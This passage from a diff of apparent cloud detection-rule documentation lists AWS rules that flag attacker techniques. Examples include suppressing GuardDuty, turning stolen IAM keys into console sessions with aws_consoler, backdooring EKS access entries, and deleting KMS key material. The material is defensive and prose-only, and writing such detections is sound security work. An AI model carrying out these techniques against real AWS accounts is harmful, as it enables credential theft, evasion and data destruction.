IAM], [Tactic: Persistence], [Tactic: Privilege Escalation], [Rule Type: BBR] |None |5 |<> |Identifies when an IAM instance profile is associated with a running EC2 instance or replaces the existing association. These APIs change which role credentials the instance obtains via the instance metadata service without terminating the instance. Attackers who can call `AssociateIamInstanceProfile` or `ReplaceIamInstanceProfile` may attach a more privileged role to a workload they control, enabling privilege escalation or lateral movement from the instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |1 @@ -158,17 +162,17 @@ and their rule type is `machine_learning`. |<> |Detects a principal account creating or replacing - or attempts to create or replace - an AWS Network Access Control List (NACL) entry using protocol -1 (all traffic). Both successful and failed outcomes are included. A NACL entry with protocol -1 passes all traffic regardless of port, which would disable network-layer controls for the affected subnets. Monitoring for new identities performing this change helps surface freshly compromised credentials or unauthorized principals removing a defense-in-depth layer to facilitate lateral movement or data exfiltration. This signal only flags if this behavior was not observed historically in a specific time window. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Identifies the creation of an AWS EC2 network access control list (ACL) or an entry in a network ACL with a specified rule number. Adversaries may exploit ACLs to establish persistence or exfiltrate data by creating permissive rules. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Network Security Monitoring], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |213 +|<> |Identifies the creation of an AWS EC2 network access control list (ACL) or an entry in a network ACL with a specified rule number. Adversaries may exploit ACLs to establish persistence or exfiltrate data by creating permissive rules. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |214 -|<> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |212 +|<> |Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access control list (ACL) or one of its ingress/egress entries. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 |<> |Identifies the first time an EC2 instance role session calls AWS STS GetCallerIdentity from a given source autonomous system (AS) organization name within the lookback window. Adversaries who steal instance role credentials often verify them with GetCallerIdentity from infrastructure outside your normal egress paths. Baseline learning on the pairing of identity and source network reduces noise from stable NAT or AWS-classified egress compared to alerting on every call from a non-Amazon ASN. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |1 -|<> |Identifies when an EC2 Route Table has been created. Route tables can be used by attackers to disrupt network traffic, reroute communications, or maintain persistence in a compromised environment. This is a New Terms rule that detects the first instance of this behavior by a user or role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Network Security Monitoring], [Tactic: Persistence], [Resources: Investigation Guide] |None |214 +|<> |Identifies when an EC2 Route Table has been created. Route tables can be used by attackers to disrupt network traffic, reroute communications, or maintain persistence in a compromised environment. This is a New Terms rule that detects the first instance of this behavior by a user or role. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Persistence], [Rule Type: New Terms], [Resources: Investigation Guide] |None |215 |<> |Identifies AWS CloudTrail events where an EC2 route table or association has been modified or deleted. Route table or association modifications can be used by attackers to disrupt network traffic, reroute communications, or maintain persistence in a compromised environment. This is a New Terms rule that detects the first instance of this behavior by a user or role. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Network Security Monitoring], [Resources: Investigation Guide], [Tactic: Persistence] |None |213 -|<> |Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Network Security Monitoring], [Resources: Investigation Guide], [Tactic: Persistence], [Tactic: Defense Evasion] |None |214 +|<> |Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Defense Evasion], [Tactic: Persistence], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |215 |<> |Detects when EC2 Serial Console Access is enabled for an AWS account. The EC2 Serial Console provides direct, text-based access to an instance's serial port, bypassing the network layer entirely. While useful for troubleshooting boot issues or network misconfigurations, enabling serial console access in production environments is rare and potentially dangerous. Adversaries may enable this feature to establish an out-of-band communication channel that evades network-based security monitoring, firewalls, and VPC controls. This access method can be used for persistent backdoor access or to interact with compromised instances without triggering network-based detection mechanisms. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |3 @@ -176,11 +180,13 @@ and their rule type is `machine_learning`. |<> |Identifies the first occurrence of an unauthorized attempt by an AWS role to use `GetPassword` to access the administrator password of an EC2 instance. Adversaries may use this API call to escalate privileges or move laterally within EC2 instances. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EC2], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Credential Access] |None |9 -|<> |Identifies discovery request DescribeInstanceAttribute with the attribute userData and instanceId in AWS CloudTrail logs. This may indicate an attempt to retrieve user data from an EC2 instance. Adversaries may use this information to gather sensitive data from the instance such as hardcoded credentials or to identify potential vulnerabilities. This is a New Terms rule that identifies the first time an IAM user or role requests the user data for a specific EC2 instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon EC2], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Discovery] |None |9 +|<> |Identifies discovery request DescribeInstanceAttribute with the attribute userData and instanceId in AWS CloudTrail logs. This may indicate an attempt to retrieve user data from an EC2 instance. Adversaries may use this information to gather sensitive data from the instance such as hardcoded credentials or to identify potential vulnerabilities. This is a New Terms rule that identifies the first time an IAM user or role requests the user data for a specific EC2 instance. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EC2], [Tactic: Discovery], [Rule Type: New Terms], [Resources: Investigation Guide] |None |10 |<> |Detects when an Amazon ECR repository or registry policy is modified to grant public access using a wildcard principal (Principal:"*") statement. This rule analyzes SetRepositoryPolicy and PutRegistryPolicy events whose policy document grants an Allow effect to a wildcard ("*") principal, indicating that pull (and potentially push) permissions were extended to all identities, including unauthenticated users. A public container registry can expose proprietary images and any secrets baked into their layers, and, if push is allowed, enables supply-chain implantation. Public ECR access is sometimes intentional for image distribution, so the granting principal and the permissions should be validated. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS ECR], [Use Case: Threat Detection], [Tactic: Exfiltration], [Resources: Investigation Guide] |None |1 -|<> |Identifies the deletion of an Amazon EFS file system using the "DeleteFileSystem" API operation. Deleting an EFS file system permanently removes all stored data and cannot be reversed. This action is rare in most environments and typically limited to controlled teardown workflows. Adversaries with sufficient permissions may delete a file system to destroy evidence, disrupt workloads, or impede recovery efforts. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EFS], [Tactic: Impact], [Resources: Investigation Guide] |None |212 +|<> |Identifies the deletion of an Amazon EFS file system using the "DeleteFileSystem" API operation. Deleting an EFS file system permanently removes all stored data and cannot be reversed. This action is rare in most environments and typically limited to controlled teardown workflows. Adversaries with sufficient permissions may delete a file system to destroy evidence, disrupt workloads, or impede recovery efforts. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EFS], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 + +|<> |Detects the creation of an Amazon EKS access entry followed by its deletion by the same identity within a short time window. EKS access entries define Kubernetes RBAC-level permissions for IAM principals in an EKS cluster. An adversary with EKS administrative access may temporarily grant themselves cluster access, use those permissions to create Kubernetes RBAC resources (ClusterRoleBindings, ServiceAccounts with privileged roles), and then delete the access entry to hide the evidence of the initial grant while retaining access through the Kubernetes-level backdoor. |[Domain: Cloud], [Domain: Kubernetes], [Platform: AWS], [Platform: Kubernetes], [Data Source: AWS CloudTrail], [Service: AWS EKS], [Rule Type: Event Correlation (EQL)], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 |<> |Detects when the AmazonEKSClusterAdminPolicy or AmazonEKSAdminPolicy is associated with a principal via the EKS Access Entries API. This grants full cluster-admin equivalent access to the specified IAM user or role. Unlike the legacy aws-auth ConfigMap which is only visible in Kubernetes audit logs, Access Entries modifications appear in CloudTrail, providing an additional detection surface. Attackers who have obtained IAM permissions to manage EKS access entries can use this API to backdoor cluster access for persistence, mapping attacker-controlled IAM identities to cluster-admin privileges without modifying any Kubernetes resources. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 @@ -188,16 +194,22 @@ and their rule type is `machine_learning`. |<> |Detects successful Amazon EKS UpdateClusterConfig requests that disable control plane logging. Disabling EKS API server and control plane logs can reduce visibility into cluster activity and may indicate defense evasion following compromised AWS credentials or unauthorized administrative access. EKS control plane logging changes are typically rare and should align with approved maintenance or cost optimization workflows. |[Domain: Cloud], [Domain: Kubernetes], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |2 -|<> |Identifies when an Amazon EventBridge rule is disabled or deleted. EventBridge rules are commonly used to automate operational workflows and security-relevant routing (for example, forwarding events to Lambda, SNS/SQS, or security tooling). Disabling or deleting a rule can break critical integrations, suppress detections, and reduce visibility. Adversaries may intentionally impair EventBridge rules to disrupt monitoring, delay response, or hide follow-on actions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS EventBridge], [Tactic: Impact], [Resources: Investigation Guide] |None |213 +|<> |Identifies when an Amazon EventBridge rule is disabled or deleted. EventBridge rules are commonly used to automate operational workflows and security-relevant routing (for example, forwarding events to Lambda, SNS/SQS, or security tooling). Disabling or deleting a rule can break critical integrations, suppress detections, and reduce visibility. Adversaries may intentionally impair EventBridge rules to disrupt monitoring, delay response, or hide follow-on actions. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS EventBridge], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |214 |<> |Identifies the first occurrence of an AWS Security Token Service (STS) GetFederationToken request made by a user. The GetFederationToken API call allows users to request temporary security credentials to access AWS resources. The maximum expiration period for these tokens is 36 hours and they can be used to create a console signin token even for identities that don't already have one. Adversaries may use this API to obtain temporary credentials for persistence and to bypass IAM API call limitations by gaining console access. |[Domain: Cloud], [Data Source: Amazon Web Services], [Data Source: AWS], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Resources: Investigation Guide] |None |8 +|<> |Detects the three-event chain produced by tools like aws_consoler that convert exfiltrated long-term IAM access keys into browser-accessible AWS console sessions: GetFederationToken obtains temporary credentials, GetSigninToken exchanges them for a federation sign-in token via the AWS federation endpoint, and ConsoleLogin confirms the resulting console session was opened — all from the same source IP within two minutes. This sequence is a high-confidence indicator of credential abuse using stolen IAM access keys. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Service: AWS STS], [Service: AWS Sign-In], [Rule Type: Event Correlation (EQL)], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 + |<> |Identifies attempts to suppress or blind Amazon GuardDuty without deleting the detector outright. Adversaries with GuardDuty permissions can create or update a trusted IP set (CreateIPSet/UpdateIPSet) so that traffic from listed addresses is never flagged, tamper with the threat intelligence feed used to generate findings (CreateThreatIntelSet/UpdateThreatIntelSet), or soft-disable the detector via UpdateDetector with Enable set to false. All three techniques leave the detector itself intact, evading detections that only look for detector deletion. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS GuardDuty], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 -|<> |Detects the deletion of an Amazon GuardDuty detector. GuardDuty provides continuous monitoring for malicious or unauthorized activity across AWS accounts. Deleting the detector disables this visibility, stopping all threat detection and removing existing findings. Adversaries may delete GuardDuty detectors to impair security monitoring and evade detection during or after an intrusion. This rule identifies successful "DeleteDetector" API calls and can indicate a deliberate defense evasion attempt. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS GuardDuty], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |212 +|<> |Detects the deletion of an Amazon GuardDuty detector. GuardDuty provides continuous monitoring for malicious or unauthorized activity across AWS accounts. Deleting the detector disables this visibility, stopping all threat detection and removing existing findings. Adversaries may delete GuardDuty detectors to impair security monitoring and evade detection during or after an intrusion. This rule identifies successful "DeleteDetector" API calls and can indicate a deliberate defense evasion attempt. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS GuardDuty], [Tactic: Defense Evasion], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |213 |<> |Detects attempts to disassociate or manipulate Amazon GuardDuty member accounts within an AWS organization. In multi-account GuardDuty deployments, a delegated administrator account aggregates findings from member accounts. Adversaries may attempt to disassociate member accounts, delete member relationships, stop monitoring members, or delete pending invitations to break this centralized visibility. These actions can be precursors to or alternatives for deleting GuardDuty detectors entirely, allowing attackers to operate undetected in member accounts while the administrator account loses visibility. This rule identifies successful API calls that manipulate GuardDuty member relationships, which are rare in normal operations and warrant immediate investigation. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS GuardDuty], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |3 +|<> |Detects the deletion of an Amazon GuardDuty publishing destination. Publishing destinations export GuardDuty findings to S3, Security Lake, or EventBridge for long-term retention and SIEM ingestion. An adversary with GuardDuty administrative access may delete a publishing destination to prevent findings from reaching external storage or a security operations center, reducing the visibility of their activity while leaving the GuardDuty detector active. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS GuardDuty], [Rule Type: Custom Query (KQL)], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 + +|<> |Detects the deletion of an Amazon GuardDuty threat intelligence set. Threat intelligence sets are custom lists of known-malicious IP addresses or domains that GuardDuty uses to generate findings when monitored resources communicate with those indicators. Deleting a threat intel set degrades GuardDuty's detection capability for known adversary infrastructure, allowing communication with threat-actor-controlled IP ranges to go undetected. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS GuardDuty], [Rule Type: Custom Query (KQL)], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 + |<> |Detects sensitive AWS IAM API operations executed using temporary session credentials (access key IDs beginning with "ASIA"). Temporary credentials are commonly issued through sts:GetSessionToken, sts:AssumeRole, or AWS SSO logins and are meant for short-term use. It is unusual for legitimate users or automated processes to perform privileged IAM actions (e.g., creating users, updating policies, or enabling/disabling MFA) with session tokens. This behavior may indicate credential theft, session hijacking, or the abuse of a privileged role’s temporary credentials. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS IAM], [Data Source: AWS STS], [Tactic: Persistence], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |7 |<> |Identifies deletion of the AWS account password policy via DeleteAccountPasswordPolicy. The account password policy enforces minimum password requirements (length, complexity, rotation, and reuse) for all IAM users in the account. Deleting it removes those requirements account-wide, weakening authentication and easing follow-on credential-based attacks. This is an account-level change that legitimately occurs only during deliberate administration, so its deletion by an unexpected principal warrants review. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |1 @@ -216,7 +228,7 @@ and their rule type is `machine_learning`. |<> |Identifies standard IAM credentials being added to an Amazon Bedrock API key phantom user, whose user name starts with "BedrockAPIKey-": either a long-term access key (CreateAccessKey) or a console password / login profile (CreateLoginProfile, UpdateLoginProfile). When a long-term Bedrock API key is generated through the AWS Console, AWS silently provisions a "BedrockAPIKey-" IAM user with the AmazonBedrockLimitedAccess managed policy. That user is intended only to back a Bedrock bearer token and should never hold standard programmatic keys or interactive console access. Adding either converts a Bedrock-scoped identity into general-purpose IAM credentials that inherit the policy's Bedrock control-plane and IAM, VPC, and KMS reconnaissance permissions and that persist after the Bedrock API key is revoked. This is the privilege-escalation and persistence pivot documented for Bedrock API key phantom users, and there is no legitimate workflow that produces it. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Data Source: Amazon Bedrock], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 -|<> |Identifies successful IAM API calls that create a new customer managed policy version or set the default version for an existing customer managed policy. Attackers with `iam:CreatePolicyVersion` or `iam:SetDefaultPolicyVersion` on a privileged policy can introduce a permissive policy document and activate it, escalating effective permissions without attaching a new policy. These APIs are high impact when the target policy is attached to powerful roles or users. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 +|<> |Identifies successful IAM API calls that create a new customer managed policy version or set the default version for an existing customer managed policy. Attackers with `iam:CreatePolicyVersion` or `iam:SetDefaultPolicyVersion` on a privileged policy can introduce a permissive policy document and activate it, escalating effective permissions without attaching a new policy. These APIs are high impact when the target policy is attached to powerful roles or users. |[Domain: Cloud], [Domain: Identity], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS IAM], [Tactic: Privilege Escalation], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |2 |<> |Detects when an AWS Identity and Access Management (IAM) customer-managed policy is attached to a role by an unusual or unauthorized user. Customer-managed policies are policies created and controlled within an AWS account, granting specific permissions to roles or users when attached. This rule identifies potential privilege escalation by flagging cases where a customer-managed policy is attached to a role by an unexpected actor, which could signal unauthorized access or misuse. Attackers may attach policies to roles to expand permissions and elevate their privileges within the AWS environment. This is a New Terms rule that uses the "cloud.account.id", "user.name" and "target.entity.id" fields to check if the combination of the actor identity and target role name has not been seen before. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |None |8 @@ -230,13 +242,13 @@ and their rule type is `machine_learning`. |<> |Identifies creation of a console login profile for the AWS account root user. While CreateLoginProfile normally applies to IAM users, when performed from a temporary root session (e.g., via AssumeRoot) and the userName parameter is omitted, the profile is created for the root principal (self-assigned). Adversaries with temporary root access may add or reset the root login profile to establish persistent console access even if original access keys are rotated or disabled. Correlate with recent AssumeRoot/STS activity and validate intent with the account owner. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |7 -|<> |Identifies when an AWS IAM login profile is added to a user. Adversaries may add a login profile to an IAM user who typically does not have one and is used only for programmatic access. This can be used to maintain access to the account even if the original access key is rotated or disabled. This is a building block rule and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Rule Type: BBR] |None |5 +|<> |Identifies when an AWS IAM login profile is added to a user. Adversaries may add a login profile to an IAM user who typically does not have one and is used only for programmatic access. This can be used to maintain access to the account even if the original access key is rotated or disabled. This is a building block rule and does not generate alerts on its own. It is meant to be used for correlation with other rules to detect suspicious activity. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS IAM], [Tactic: Persistence], [Rule Type: BBR] |None |6 |<> |Identifies creation or modification of a console login profile for an AWS IAM user via CreateLoginProfile or UpdateLoginProfile. A login profile enables password-based console sign-in for an IAM user. Adversaries who obtain programmatic credentials may create a login profile to add persistent interactive console access, or update an existing profile to reset another user's password and take over the account, even after the original access keys are rotated. Because console access for IAM users is increasingly provisioned through federation or IAM Identity Center, direct use of these APIs by an unexpected principal warrants review. This rule targets IAM users (the userName parameter is present); creation of a login profile for the account root user is covered by a separate rule. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 |<> |Identifies the first time, within the configured history window, that a long-term IAM access key ID (prefix AKIA) is used successfully from a given source.ip in AWS CloudTrail. Long-term access keys belong to IAM users or the account root user. They are a common target after credential theft or leakage, including supply-chain and exposed-key scenarios. Temporary security credentials (prefix ASIA) and console sessions are excluded so the signal emphasizes programmatic access patterns. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS IAM], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Initial Access], [Resources: Investigation Guide] |None |2 -|<> |Detects when an uncommon user or role creates an OpenID Connect (OIDC) Identity Provider in AWS IAM. OIDC providers enable web identity federation, allowing users authenticated by external identity providers (such as Google, GitHub, or custom OIDC-compliant providers) to assume IAM roles and access AWS resources. Adversaries who have gained administrative access may create rogue OIDC providers to establish persistent, federated access that survives credential rotation. This technique allows attackers to assume roles using tokens from an IdP they control. While OIDC provider creation is benign in some environments, it should still be validated against authorized infrastructure changes. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |4 +|<> |Detects when an uncommon user or role creates an OpenID Connect (OIDC) Identity Provider in AWS IAM. OIDC providers enable web identity federation, allowing users authenticated by external identity providers (such as Google, GitHub, or custom OIDC-compliant providers) to assume IAM roles and access AWS resources. Adversaries who have gained administrative access may create rogue OIDC providers to establish persistent, federated access that survives credential rotation. This technique allows attackers to assume roles using tokens from an IdP they control. While OIDC provider creation is benign in some environments, it should still be validated against authorized infrastructure changes. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS IAM], [Tactic: Persistence], [Rule Type: New Terms], [Resources: Investigation Guide] |None |5 |<> |Detects the first time an AWS identity successfully deletes an IAM managed policy whose ARN contains guardrail-related keywords (for example Boundary, Deny, Restrict, Guard, SCP, Guardrail). Adversaries who have obtained elevated IAM privileges may delete policies to remove restrictive permissions boundaries, eliminate deny-based guardrails, or clean up after a privilege escalation operation. Infrastructure-as-code tools (Terraform, CloudFormation, Pulumi, and Ansible) are excluded because policy lifecycle management is a routine part of automated deployments. A policy deletion by an identity not seen performing this activity during the prior seven days may indicate newly compromised credentials being used to modify the account's permission structure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 @@ -260,23 +272,23 @@ and their rule type is `machine_learning`. |<> |Identifies an IAM user that successfully signs in to the AWS Management Console from two or more distinct countries within a short window. A single user authenticating from multiple geographic locations in a brief period is physically implausible and indicates that the account's credentials or console session are being used from more than one place at once. This is a hallmark of adversary-in-the-middle (AiTM) phishing and session theft, where the legitimate user signs in from their location while the attacker replays the captured session or credentials from their own infrastructure. Because the attacker logs in from a different network, the divergent sign-in geolocations are the detectable signal even when MFA appears satisfied (AiTM relays the live MFA challenge). This is the CloudTrail-native analog of identity-provider impossible-travel sign-in detections. |[Domain: Cloud], [Domain: Identity], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Sign-In], [Use Case: Identity and Access Audit], [Tactic: Initial Access], [Tactic: Credential Access], [Resources: Investigation Guide] |None |2 -|<> |An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Persistence], [Resources: Investigation Guide] |None |14 +|<> |An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS IAM], [Tactic: Persistence], [Tactic: Privilege Escalation], [Rule Type: ESQL], [Resources: Investigation Guide] |None |15 |<> |Detects an AWS IAM user using an existing credential to create a new access key for itself and subsequently using the new key within one hour. This behavior can indicate an adversary converting compromised credentials into an additional long-term credential for persistence. Unlike a standalone self-service key creation alert, requiring subsequent use of the new key reduces noise from unused or abandoned credential-rotation operations. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |1 |<> |Detects attempts to create or enable a Virtual MFA device (CreateVirtualMFADevice, EnableMFADevice) using temporary AWS credentials (access keys beginning with ASIA). Session credentials are short-lived and tied to existing authenticated sessions, so using them to register or enable MFA devices is unusual. Adversaries who compromise temporary credentials may abuse this behavior to establish persistence by attaching new MFA devices to maintain access to high-privilege accounts despite key rotation or password resets. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS IAM], [Tactic: Persistence], [Use Case: Identity and Access Audit], [Resources: Investigation Guide] |None |5 -|<> |Identifies attempts to disable or schedule the deletion of an AWS customer managed KMS Key. Disabling or scheduling a KMS key for deletion removes the ability to decrypt data encrypted under that key and can permanently destroy access to critical resources. Adversaries may use these operations to cause irreversible data loss, disrupt business operations, impede incident response, or hide evidence of prior activity. Because KMS keys often protect sensitive or regulated data, any modification to their lifecycle should be considered highly sensitive and investigated promptly. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS KMS], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |113 +|<> |Identifies attempts to disable or schedule the deletion of an AWS customer managed KMS Key. Disabling or scheduling a KMS key for deletion removes the ability to decrypt data encrypted under that key and can permanently destroy access to critical resources. Adversaries may use these operations to cause irreversible data loss, disrupt business operations, impede incident response, or hide evidence of prior activity. Because KMS keys often protect sensitive or regulated data, any modification to their lifecycle should be considered highly sensitive and investigated promptly. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS KMS], [Tactic: Impact], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |114 |<> |Identifies deletion of imported key material from an AWS KMS customer managed key via DeleteImportedKeyMaterial. Keys created with an external key material origin (BYOK) rely on key material that the customer imports. Deleting that material immediately makes the key unusable and renders all data encrypted under it inaccessible, with no recovery window. Unlike ScheduleKeyDeletion, which enforces a pending deletion period of 7 to 30 days, this action takes effect instantly, making it an attractive primitive for cloud ransomware and data-destruction attacks. Because this operation only applies to external-origin keys and is rare in normal operations, its use by an unexpected principal warrants prompt review. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS KMS], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |1 -|<> |Identifies successful PutKeyPolicy calls on AWS KMS keys. The key policy is a resource-based policy that controls which principals can use the key for cryptographic operations and administration. Adversaries with "kms:PutKeyPolicy" may add or broaden principals (including external accounts) to decrypt or exfiltrate data protected by the key, or to preserve access after other credentials are rotated. This is distinct from disabling or scheduling deletion of the key. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS KMS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide] |None |1 +|<> |Identifies successful PutKeyPolicy calls on AWS KMS keys. The key policy is a resource-based policy that controls which principals can use the key for cryptographic operations and administration. Adversaries with "kms:PutKeyPolicy" may add or broaden principals (including external accounts) to decrypt or exfiltrate data protected by the key, or to preserve access after other credentials are rotated. This is distinct from disabling or scheduling deletion of the key. |[Domain: Cloud], [Platform: AWS], [Data Source: AWS CloudTrail], [Service: AWS KMS], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Rule Type: Custom Query (KQL)], [Resources: Investigation Guide] |None |2 |<> |Identifies the creation of an AWS Lambda event source mapping, which connects an event source such as an Amazon SQS queue, an Amazon Kinesis or DynamoDB stream, an 